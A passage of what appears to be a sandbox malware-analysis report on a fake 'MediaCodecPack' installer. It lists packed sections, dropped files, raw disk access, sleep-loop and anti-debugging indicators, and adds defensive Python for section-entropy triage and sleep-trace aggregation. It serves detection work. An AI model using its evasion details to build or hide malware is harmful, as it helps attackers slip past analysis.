                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .altt4
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /4
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /19
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /35
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /51
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /63
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /77
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /89
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /102
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /113
                    Source: sqlite3.dll.3.dr | Static PE information: section name: /124
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax 1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx 1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx 1_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx 1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx 1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx 1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx 1_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004519BC push ecx; mov dword ptr [esp], eax 1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx 1_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx 1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx 1_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00409E4F push ds; ret 1_2_00409E50
                    Source: mediacodecpack.exe.1.dr | Static PE information: section name: .aitt4 entropy: 7.74249878627152
                    Source: MediaCodecPack.exe.3.dr | Static PE information: section name: .aitt4 entropy: 7.74249878627152
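The section-table findings above (entry point in .aitt4, five non-standard section names, entropy 7.74 on the entry section, and .altt4 mapped EW, against the unpacked image's conventional .text/.rdata/.data layout) are the usual profile of a runtime packer. The Python below is an added example, not Joe Sandbox's or the sample's code: using only the standard library it walks the PE header, computes Shannon entropy per section and flags the entry section, high-entropy executable sections and writable-plus-executable sections, which is the same logic behind the report's rows. The input is a constructed PE32 image whose section table mirrors the report; its sizes, filler bytes and entry RVA are assumptions made for the demonstration. One caveat on the other rows: the "/4", "/19" ... "/124" names on is-JJJFI.tmp and sqlite3.dll are not obfuscation but COFF string-table references, which GNU ld emits for section names longer than eight bytes (typically .debug_* sections), so a MinGW-built sqlite3.dll looks exactly like this.

```python
"""PE section-table triage, as an added example; this is not Joe Sandbox code."""
import hashlib
import math
import struct

# Section Characteristics bits from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_CODE_SECTIONS = {".text", "CODE"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is uniform; packed or encrypted code is typically above 7."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE32/PE32+ file image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(num_sections):
        hdr = opt + size_opt + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, hdr)
        chars = struct.unpack_from("<I", pe, hdr + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "chars": chars,
                         "data": pe[raw_ptr:raw_ptr + raw_size]})
    return entry_rva, sections


def rights(chars: int) -> str:
    """Render section rights the way the report does, e.g. 'ER' or 'EW'."""
    return (("E" if chars & IMAGE_SCN_MEM_EXECUTE else "")
            + ("R" if chars & IMAGE_SCN_MEM_READ else "")
            + ("W" if chars & IMAGE_SCN_MEM_WRITE else ""))


def triage(pe: bytes, entropy_threshold: float = 7.0) -> list:
    """Human-readable findings: odd entry section, packed code, self-modifying sections."""
    entry_rva, sections = parse_sections(pe)
    findings = []
    for s in sections:
        ent = shannon_entropy(s["data"])
        span = max(s["vsize"], len(s["data"]))
        if s["va"] <= entry_rva < s["va"] + span and s["name"] not in STANDARD_CODE_SECTIONS:
            findings.append(f"entry point {entry_rva:#x} lies in non-standard section {s['name']}")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and ent > entropy_threshold:
            findings.append(f"{s['name']}: executable section with entropy {ent:.2f} (likely packed)")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s['name']}: mapped {rights(s['chars'])}, unpacker writes code here")
    return findings


def _pseudo_random(n: int, seed: bytes) -> bytes:
    """Deterministic high-entropy filler standing in for a packed section."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe() -> bytes:
    """Constructed sample (assumption): a PE32 whose section table mirrors the report,
    .aitt4:ER holding the entry point, .ajtt4:R, .aktt4:W, .rsrc:R, .altt4:EW."""
    E, R, W = IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    layout = [(b".aitt4", E | R, _pseudo_random(4096, b"aitt4")),
              (b".ajtt4", R, b"\0" * 512),
              (b".aktt4", W, b"\0" * 512),
              (b".rsrc", R, b"RSRC" * 128),
              (b".altt4", E | W, b"\xCC" * 512)]
    file_align, sect_align = 0x200, 0x1000
    raw_ptr, va, sect_headers, raw = file_align, 0x1000, b"", b""
    for name, chars, data in layout:
        padded = data + b"\0" * (-len(data) % file_align)
        sect_headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                                    len(padded), raw_ptr, 0, 0, 0, 0, chars)
        raw += padded
        raw_ptr += len(padded)
        va += -(-len(padded) // sect_align) * sect_align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 14, 0, 4096, 0, 0, 0x1010)    # entry 0x1010 in .aitt4
    opt += b"\0" * (224 - len(opt))
    header = dos + b"PE\0\0" + coff + opt + sect_headers
    header += b"\0" * (-len(header) % file_align)
    return header + raw
```

Running `triage(build_sample_pe())` yields three findings that correspond one-to-one to the report's rows: the entry point in .aitt4, .aitt4 as a high-entropy executable section, and .altt4 mapped EW. Point `triage` at a real dropped file by reading it with `open(path, "rb").read()`; the entropy threshold is deliberately a parameter, since resource-heavy binaries legitimately exceed 7.0 in non-executable sections, which is why only executable sections are scored here.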

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D0E8A7
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-UJAIS.tmp
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | File created: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-JJJFI.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-P1HNB.tmp
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | File created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | File created: C:\ProgramData\MediaCodecPack\sqlite3.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NDPJ4.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-8I59M.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-VMCDM.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D0E8A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_00401C49 StartServiceCtrlDispatcherA,3_2_00401C49
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02D0E9AB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Window / User API: threadDelayed 5240
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Window / User API: threadDelayed 4688
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-UJAIS.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-JJJFI.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-P1HNB.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NDPJ4.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-8I59M.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-VMCDM.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-S4TFH.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5966
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | API coverage: 4.8 %
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 7424 | Thread sleep count: 5240 > 30
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 7424 | Thread sleep time: -10480000s >= -30000s
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 6008 | Thread sleep time: -1140000s >= -30000s
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 7424 | Thread sleep count: 4688 > 30
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 7424 | Thread sleep time: -9376000s >= -30000s
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | File opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Thread delayed: delay time: 60000
                    Source: mediacodecpack.exe, 00000003.00000002.2572840058.00000000009D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@?6
                    Source: mediacodecpack.exe, 00000003.00000002.2576046673.0000000003360000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe | API call chain: ExitProcess graph end node graph_0-6763
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | API call chain: ExitProcess graph end node graph_3-61177
                    Source: C:\Users\user\AppData\Local\Temp\is-TFSNR.tmp\newwork.exe.1.tmp | Process information queried: ProcessInformation
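Two practitioner notes on this section. First, on the raw-disk rows: CreateFileA on \\.\PhysicalDrive0 followed by DeviceIoControl, sitting within a few hundred bytes of the cpuid routine at 3_2_02D0E85F and the GetAdaptersInfo routine at 3_2_02D0E9AB, with no write to the handle reported, is at least as consistent with collecting disk, CPU and adapter identifiers for a host fingerprint as with boot-sector infection; confirm a write to the device (or a changed MBR) before treating it as boot survival. Second, on the sleep rows: the totals for TID 7424 (-10480000 over 5240 calls, then -9376000 over 4688) divide to exactly 2000 per call, so this is a loop of short sleeps rather than one long sleep, and TID 6008's -1140000 is nineteen times the single 60000 delay reported. A sandbox that only shortens individual long sleeps lets such a loop run out the clock; the right metric is the per-thread aggregate. The Python below is an added example, neither Joe Sandbox's nor the sample's code: it aggregates an NtDelayExecution-style trace per thread, converting the signed 100 ns DelayInterval values and handling the absolute (positive) form as well. The trace is constructed to reproduce the report's totals on the assumption that its figures are milliseconds; that unit is inferred from the arithmetic, not stated on the page.

```python
"""Sleep-evasion aggregation over a delay trace, as an added example; not Joe Sandbox code."""
from collections import defaultdict

HNS_PER_MS = 10_000  # 100 ns units in one millisecond


def delay_to_ms(interval: int, now_hns: int = 0) -> int:
    """Convert an NtDelayExecution DelayInterval to a relative delay in ms.

    Negative values are relative (the usual form); positive values are absolute
    system times and are measured from now_hns. Times already past yield 0."""
    rel = -interval if interval < 0 else interval - now_hns
    return max(rel, 0) // HNS_PER_MS


def summarize(trace, per_call_threshold_ms: int = 30_000, budget_ms: int = 30_000) -> dict:
    """Per-thread count, total and longest sleep, plus a verdict per thread.

    trace: iterable of (thread id, DelayInterval) pairs in call order."""
    per_thread = defaultdict(lambda: {"count": 0, "total_ms": 0, "max_ms": 0})
    for tid, interval in trace:
        ms = delay_to_ms(interval)
        t = per_thread[tid]
        t["count"] += 1
        t["total_ms"] += ms
        t["max_ms"] = max(t["max_ms"], ms)
    result = {}
    for tid, t in per_thread.items():
        if t["max_ms"] >= per_call_threshold_ms:
            verdict = "single long sleep"
        elif t["total_ms"] >= budget_ms:
            # Every call is below the per-call threshold; a sandbox that only
            # shortens long sleeps would let this thread run out the clock.
            verdict = "sleep loop below per-call threshold"
        else:
            verdict = "benign"
        result[tid] = {**t, "verdict": verdict}
    return result


# Constructed trace (an assumption, not data from the report): thread 7424 sleeps
# 2 s 5240 times, thread 6008 sleeps 60 s 19 times, thread 1234 is a benign
# control with ten 50 ms sleeps. The first two reproduce the report's totals
# (5240 calls, -10480000 and -1140000) if those figures are milliseconds.
SAMPLE_TRACE = (
    [(7424, -2_000 * HNS_PER_MS)] * 5240
    + [(6008, -60_000 * HNS_PER_MS)] * 19
    + [(1234, -50 * HNS_PER_MS)] * 10
)
```

`summarize(SAMPLE_TRACE)` marks 7424 as a sleep loop (5240 calls, 10,480,000 ms total, longest call 2000 ms), 6008 as a single long sleep and 1234 as benign. The two thresholds are separate on purpose: `per_call_threshold_ms` is what a naive sleep-skipping sandbox applies to each call, and `budget_ms` is the aggregate that a thread must not exceed regardless of how the sleeps are sliced.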

                    Anti Debugging

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_3-60868
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D13A08 _memset,IsDebuggerPresent,3_2_02D13A08
